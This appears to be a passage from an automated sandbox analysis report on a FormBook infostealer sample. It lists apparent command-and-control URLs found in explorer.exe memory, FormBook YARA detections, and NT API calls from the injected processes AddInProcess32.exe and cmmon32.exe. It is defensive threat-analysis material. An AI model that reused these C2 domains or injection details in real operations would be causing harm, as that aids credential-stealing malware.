          Source: explorer.exe, 0000000D.00000000.325706052.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/www.lhc965.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.bebywye.site
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.bebywye.site/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.bebywye.site/jqc/www.ip-freight.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.bebywye.siteReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.eaglesnestpropheticministry.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.eaglesnestpropheticministry.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.eaglesnestpropheticministry.com/jqc/www.internetmarkaching.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.eaglesnestpropheticministry.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/www.weddingmustgoon.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ip-freight.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ip-freight.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ip-freight.com/jqc/www.toweroflifeinc.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ip-freight.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kenniscourtureconsignments.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kenniscourtureconsignments.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kenniscourtureconsignments.com/jqc/www.novergi.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kenniscourtureconsignments.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com/jqc/www.topheadlinetowitness-today.info
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/M
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/www.tiendazoom.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital/jqc/www.theorangepearl.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digitalReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/www.registeredagentfirm.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com/jqc/www.11sxsx.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com/jqc/www.eaglesnestpropheticministry.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info/jqc/www.kenniscourtureconsignments.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.infoReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/www.strahlenschutz.digital
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com/jqc/www.bebywye.site
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419D60 NtCreateFile,5_2_00419D60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419E10 NtReadFile,5_2_00419E10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419E90 NtClose,5_2_00419E90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419F40 NtAllocateVirtualMemory,5_2_00419F40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419D5D NtCreateFile,5_2_00419D5D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419E0B NtReadFile,5_2_00419E0B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419E8A NtClose,5_2_00419E8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00419F3A NtAllocateVirtualMemory,5_2_00419F3A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018599A0 NtCreateSection,LdrInitializeThunk,5_2_018599A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018595D0 NtClose,LdrInitializeThunk,5_2_018595D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01859910
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859540 NtReadFile,LdrInitializeThunk,5_2_01859540
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018598F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_018598F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859840 NtDelayExecution,LdrInitializeThunk,5_2_01859840
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859860 NtQuerySystemInformation,LdrInitializeThunk,5_2_01859860
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859780 NtMapViewOfSection,LdrInitializeThunk,5_2_01859780
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018597A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_018597A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859710 NtQueryInformationToken,LdrInitializeThunk,5_2_01859710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018596E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_018596E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_01859A00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859A20 NtResumeThread,LdrInitializeThunk,5_2_01859A20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859A50 NtCreateFile,LdrInitializeThunk,5_2_01859A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_01859660
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018599D0 NtCreateProcessEx,5_2_018599D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018595F0 NtQueryInformationFile,5_2_018595F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859520 NtWaitForSingleObject,5_2_01859520
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185AD30 NtSetContextThread,5_2_0185AD30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859950 NtQueueApcThread,5_2_01859950
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859560 NtWriteFile,5_2_01859560
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018598A0 NtWriteVirtualMemory,5_2_018598A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859820 NtEnumerateKey,5_2_01859820
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185B040 NtSuspendThread,5_2_0185B040
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185A3B0 NtGetContextThread,5_2_0185A3B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859FE0 NtCreateMutant,5_2_01859FE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859B00 NtSetValueKey,5_2_01859B00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185A710 NtOpenProcessToken,5_2_0185A710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859730 NtQueryVirtualMemory,5_2_01859730
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859760 NtOpenProcess,5_2_01859760
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859770 NtSetInformationFile,5_2_01859770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185A770 NtOpenThread,5_2_0185A770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859A80 NtOpenDirectoryObject,5_2_01859A80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018596D0 NtCreateKey,5_2_018596D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859610 NtEnumerateValueKey,5_2_01859610
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859A10 NtQuerySection,5_2_01859A10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859650 NtQueryValueKey,5_2_01859650
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01859670 NtQueryInformationProcess,5_2_01859670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29860 NtQuerySystemInformation,LdrInitializeThunk,19_2_04E29860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29840 NtDelayExecution,LdrInitializeThunk,19_2_04E29840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E295D0 NtClose,LdrInitializeThunk,19_2_04E295D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E299A0 NtCreateSection,LdrInitializeThunk,19_2_04E299A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29540 NtReadFile,LdrInitializeThunk,19_2_04E29540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29910 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_04E29910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E296E0 NtFreeVirtualMemory,LdrInitializeThunk,19_2_04E296E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E296D0 NtCreateKey,LdrInitializeThunk,19_2_04E296D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29660 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_04E29660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29650 NtQueryValueKey,LdrInitializeThunk,19_2_04E29650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29A50 NtCreateFile,LdrInitializeThunk,19_2_04E29A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29FE0 NtCreateMutant,LdrInitializeThunk,19_2_04E29FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29780 NtMapViewOfSection,LdrInitializeThunk,19_2_04E29780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29710 NtQueryInformationToken,LdrInitializeThunk,19_2_04E29710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E298F0 NtReadVirtualMemory,19_2_04E298F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E298A0 NtWriteVirtualMemory,19_2_04E298A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E2B040 NtSuspendThread,19_2_04E2B040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29820 NtEnumerateKey,19_2_04E29820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E295F0 NtQueryInformationFile,19_2_04E295F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E299D0 NtCreateProcessEx,19_2_04E299D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29560 NtWriteFile,19_2_04E29560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29950 NtQueueApcThread,19_2_04E29950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29520 NtWaitForSingleObject,19_2_04E29520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E2AD30 NtSetContextThread,19_2_04E2AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29A80 NtOpenDirectoryObject,19_2_04E29A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29670 NtQueryInformationProcess,19_2_04E29670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29A20 NtResumeThread,19_2_04E29A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29A00 NtProtectVirtualMemory,19_2_04E29A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29610 NtEnumerateValueKey,19_2_04E29610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29A10 NtQuerySection,19_2_04E29A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E297A0 NtUnmapViewOfSection,19_2_04E297A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E2A3B0 NtGetContextThread,19_2_04E2A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29760 NtOpenProcess,19_2_04E29760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29770 NtSetInformationFile,19_2_04E29770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E2A770 NtOpenThread,19_2_04E2A770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29730 NtQueryVirtualMemory,19_2_04E29730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E29B00 NtSetValueKey,19_2_04E29B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E2A710 NtOpenProcessToken,19_2_04E2A710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9D60 NtCreateFile,19_2_00ED9D60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9E90 NtClose,19_2_00ED9E90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9E10 NtReadFile,19_2_00ED9E10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9F40 NtAllocateVirtualMemory,19_2_00ED9F40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9D5D NtCreateFile,19_2_00ED9D5D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00ED9E8A NtClose,19_2_00ED9E8A
